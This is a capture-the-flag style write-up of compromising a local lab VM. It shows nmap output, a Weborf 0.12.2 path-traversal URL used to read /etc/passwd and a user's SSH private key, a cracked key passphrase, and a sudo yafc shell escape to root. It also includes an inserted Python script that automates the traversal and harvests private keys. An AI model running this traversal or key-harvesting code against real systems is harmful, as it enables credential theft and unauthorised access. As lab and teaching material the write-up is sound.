# Lab setup

Download: Share

Download the VM, import it, and set the network adapter to NAT.

IP: 192.168.1.132

# Penetration process

# Initial information gathering

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http-proxy Weborf (GNU/Linux)
| http-webdav-scan: 
|   WebDAV type: Apache DAV
|   Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_  Server Type: Weborf (GNU/Linux)
| http-methods: 
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-title: Weborf
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 960
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-timesyncd.service-mR66hj/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html

Port 8080 allows PUT, so the first thing to try is uploading a file.

That gets a 403, so back to gathering information.

The fingerprint gives the exact version: Weborf/0.12.2.

A quick search turns up an exploit, a URL-encoded path traversal (`..%2f` instead of `../`): http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

It is an arbitrary file read (the write-up treats it as LFI). In the returned /etc/passwd only root and tim have a real login shell, so those are the only accounts worth going after.

Running a list of sensitive file paths through the traversal yields: http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa

That is tim's RSA private key. Logging in with it prompts for a passphrase, so the key is encrypted.

Convert the key to a john hash (ssh2john) and crack the passphrase:
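The read-and-harvest step above, as an added example that is not part of the original write-up: a small client that builds the same `..%2f` traversal URLs the write-up uses against the Weborf instance on 192.168.1.132:8080, reads /etc/passwd, keeps only accounts with a login shell (the "only root and tim" observation), and then tries each account's `~/.ssh/id_rsa`. The target and the traversal depth of seven segments come from the write-up's URLs; the function names and the `SAMPLE_PASSWD` text are this example's own constructions.

```python
"""Weborf 0.12.2 path-traversal file reader (added example, not from the write-up)."""
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://192.168.1.132:8080"  # Weborf instance from the write-up
DEPTH = 7                             # number of ..%2f segments in the write-up's URLs

# Constructed sample of what the traversal returned; mirrors the write-up's
# observation that only root and tim have a usable shell.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
tim:x:1000:1000:tim,,,:/home/tim:/bin/bash
"""


def traversal_url(path, base=TARGET, depth=DEPTH):
    """Build the traversal URL for an absolute path on the target.

    Every '/' inside the path is sent as '%2f', exactly like the write-up's
    URLs, and each component is percent-encoded so odd filenames survive.
    """
    parts = path.lstrip("/").split("/")
    encoded = "%2f".join(urllib.parse.quote(p, safe="") for p in parts)
    return f"{base}/" + "..%2f" * depth + encoded


def fetch(path, timeout=5):
    """Read `path` through the traversal; returns (http_status, body_bytes).

    Non-2xx responses (the 404 page Weborf generates, or a 403) are returned
    rather than raised so the caller can tell "missing" from "forbidden".
    """
    req = urllib.request.Request(traversal_url(path), headers={"User-Agent": "curl/8"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def login_users(passwd_text):
    """Return [(user, home)] for passwd entries whose shell is interactive.

    A shell is treated as interactive when its basename ends in 'sh'
    (bash, sh, zsh, ...); nologin, false and sync are thereby excluded.
    """
    found = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue
        user, home, shell = fields[0], fields[5], fields[6]
        if shell.rsplit("/", 1)[-1].endswith("sh"):
            found.append((user, home))
    return found


def candidate_key_paths(users):
    """Default SSH private-key location for each (user, home) pair."""
    return [f"{home}/.ssh/id_rsa" for _, home in users]


def main():
    status, body = fetch("/etc/passwd")
    if status != 200:
        print(f"traversal read of /etc/passwd failed: HTTP {status}")
        return
    users = login_users(body.decode(errors="replace"))
    print("accounts with a login shell:", [u for u, _ in users])
    for (user, _), key_path in zip(users, candidate_key_paths(users)):
        status, key = fetch(key_path)
        if status == 200 and key.startswith(b"-----BEGIN"):
            print(f"[+] {key_path} ({user}):")
            print(key.decode(errors="replace"))
        else:
            print(f"[-] {key_path}: HTTP {status}")


if __name__ == "__main__":
    main()
```

Only `fetch()` touches the network; the URL builder and the passwd filter work offline, which is what makes the logic checkable before pointing it at a target. If the key for root is also readable, the same loop picks it up, so the example is slightly more general than the write-up's single tim path.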

┌──(root㉿kali)-[~]
└─# john --format=SSH id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovetim         (id_rsa)     
1g 0:00:00:00 DONE (2024-05-17 23:21) 2.702g/s 14270p/s 14270c/s 14270C/s badbitch..ilovetim
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Passphrase: ilovetim

# Privilege escalation

`sudo -l` shows that yafc can be run with sudo; a search shows it is an FTP client.

It has a shell command.

Run it with sudo, execute the shell command, and that's it, folks: root.

# Summary

John, John, John!